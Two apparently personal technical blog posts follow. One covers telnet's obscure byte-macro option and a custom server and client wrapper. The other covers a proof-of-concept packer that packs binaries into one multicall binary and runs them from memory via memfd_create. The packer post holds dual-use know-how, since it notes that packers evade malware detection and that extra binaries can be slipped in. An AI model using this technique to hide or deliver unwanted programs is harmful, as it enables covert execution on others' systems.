The telnet protocol is an interesting one full of a lot of history I am totally ignorant to. While playing around with implementing a telnet server that spoke some of the more telnet specific protocol language, I went through the list of telnet command options and one stood out particularly to me. Option 19, byte macros, allows for customizable macro definitions where a single byte will be translated into a replacement string after being received. Unfortunately, no telnet client I found was willing to support this option and would always just respond with IAC WONT BM, telnet protocol for refusing to support an option, and would proceed to ignore any subnegotiations specifying byte macro translations.

Background

Telnet's protocol for setting options is fairly simple and involves some negotiations between clients and servers. Either party can send a DO or DONT byte to the other, followed by an option code. The other party will then respond with a WILL or WONT byte followed by the option code telling the requester if it will or will not support that option. All of these communications begin with an IAC byte, short for Interpret As Command. A request for byte macro option support, for example, would look something like IAC DO BM. A response to it could look like IAC WILL BM. These constants translate to a fixed byte value. For example, IAC translates to 0xFF, or as the telnet rfc calls it, "Data Byte 255." The series of constants IAC DO BM translated to hex would look like 0xFF 0xFD 0x13.

telnet protocol

Byte Macro is an obscure and likely long forgotten and unsupported telnet option that upon googling, nobody really seems to talk or think about. It allows for one side of the telnet connection to tell the other that instead of sending a certain series of bytes, to only send a single byte instead that it will replace with that series of bytes before processing it. In common terms, the server could tell the client, "Hey, instead of sending me the string 'nslookup', just send me a single 0x96 instead and I'll know what you mean." The rfc from 1977 states this option is intended to serve as a simple data compression technique.

A subnegotiation for an actual byte macro definition is in the form of IAC SB BM [DEFINE] [macro byte] [count] [replacement string] IAC SE where SB and SE define the start and end of a subnegotation respectfully, [DEFINE] is a constant 1, [macro byte] is the byte that the sender wants to receive instead of [replacement string] and will take to mean it instead, and [count] is the number of bytes of [replacement string]. If the recipient of this subnegotiation supports the byte macro option, it will send back a subnegotation detailing that it is accepting the definition of the macro byte. The recipient can also refuse definitions for various reasons. The below image shows an example of a definition being made of macro byte 0x89 being used to represent the replacement string of "rc".

byte macro definition subnegotiation

When playing with implementing my own telnet server in nodejs I tried to see if the default telnet client on my debian box, Linux Netkit 0.17 telnet, would respond positively to a request to support the byte macro option and was disappointed when it wouldn't. Upon looking at a few more clients, none of them were willing to support it out of the box. I don't know if there is a client out there that supports the option or not and instead of researching that further I decided to jump the gun and implement my own wrapper for the client I already had on my machine to support a subset of the byte macro option.

Implementation

The wrapper I wrote for the telnet client involves a few logical parts:

The custom telnet server implementation I wrote is very naive and functions with a few rules:

Demonstration

The actual source code of these components can be found here. A segment of the resulting communication between these components setting a byte macro and then using it can be seen as follows.

byte macro discussion

The first message is from the server to the client, telling it to support byte macros and then listing a subnegotiation for a byte macro where instead of sending "ls" the client will send 0x89.

The second message is from the client to the server, telling it that it will support byte macros and then accepting the byte macro for 0x89.

The third message is from the client to the server, telling it "\x89 -a\r\n", or, the byte macro translated version of "ls -a\r\n".

The fourth message is from the server to the client and includes the response to the server running ls -a on its /bin/sh subprocess.

It is clear that the client and server both recognize the byte macro to translate 0x89 as a macro for ls and the command is run successfully.

Conclusion

Byte Macros, while they may not be useful in any realistic situation or even supported, are an example and reminder that even protocols as old and simple as telnet can support strange things, and that verifying a communication for a protocol is "valid" doesn't mean it isn't potentially using some options nobody has ever heard of under the hood that may allow for unforeseen consequences. It is very interesting that writing a wrapper for a telnet client to do byte macro expansion is valid telnet protocol and that there's even a reserved option for it. Learning and understanding the full feature sets of applications and protocols is a surprising and sometimes scary experience that can reveal just how many strange oddities there are covered in dust that could very well break some system later down the road because they are so rarely thought of.


Multicall Binary Packer

Wed 28 Apr 2021 05:47:27 PM

Multicall binaries are cool. Packers are cool. I wanted to make a proof of concept packer that would pack multiple binaries into a multicall binary because it sounded cool squared. I also wanted to see if I could even do it and if I could think of any use for it.

Background

A multicall binary is a binary that changes behavior based on the name it is executed as. Busybox is probably the most common example of this. Busybox is a size optimized collection of userland tools and programs that exists as a single multicall binary. Depending on the name this binary is executed as, a different codepath is run. Symlinking /bin/busybox to a soft link called ls and executing it will invoke /bin/busybox with argv[0] as ls, which the busybox binary will see and then run only the codepath for ls. Having several different utilities in one binary like this allows for code sharing and reuse with less overhead and allows busybox to be even smaller.

A packer is a tool that packs a compiled binary into a new binary that runs the packed binary, usually transforming it in some way either for compression reasons or to avoid malware detection. This is commonly used for malicious purposes.

A multicall binary therefore would be a binary that has several existing binaries packed into it. It would choose which one to unpack and execute based on the name it is executed as, hence, multicall. It loses the practical purpose of code sharing from a traditional multicall binary because each unique call is its own independent compiled binary running only its own code. There isn't really a good use for this beyond it being a cool party trick and a way to take binaries already on a system and fuse them into one multicall binary.

My plan to implement a multicall binary was to write a nodejs script that ingested a list of paths of binaries on the system to pack into one multicall binary. The script would then copy over some C files with code to act as a multicall binary and generate header files that included the bytes of the binaries. These would then all be compiled into a binary that would unpack and execute different binaries based on what its name is.

Implementation

The source for my proof of concept multicall binary packer can be found here.

The script itself follows the following steps:

The template C files that get built into the multicall packed binary follow the following execution steps:

The C code relies heavily on abusing the preprocessor and including files in odd places with fixed names that get generated by the script. The key to all of this is the memfd_create call that allows for writing the unpacked selected binary into a file that only exists in memory and being able to execute it from the file descriptor.

Demo

A file will be created named "binary_list.txt" that includes the binaries to be packed into a single multicall binary.

The binary list

The script will then be called with the list file passed as an argument and it will build the multicall binary in the build/ folder.

The binary list

From there the mcall binary can be executed and it will do nothing. Creating a symlink for each packed binary inside will allow you to execute mcall with a different name, having it unpack and execute the selected binary.

The binary list

Copying the mcall binary to a binary named each thing would also work to have it unpack and execute the specified binary.

Conclusion

While it may not be useful, it is very much possible, and not very difficult to compress and pack entire binaries into one binary that unpacks and executes a packed binary based on the name it is executed as. This could be a cool party trick or interesting way to mess with a friend you are on a system with, but doesn't seem very practical or useful. It was a cool thing to figure out how to get working and I'm pretty happy with the end result. It's cool to see the things you can do that there really is no reason to do and punch around code until you get it working. Now I can pack any binary into anything and slip in some extra binaries if I want, as limitedly useful as this is.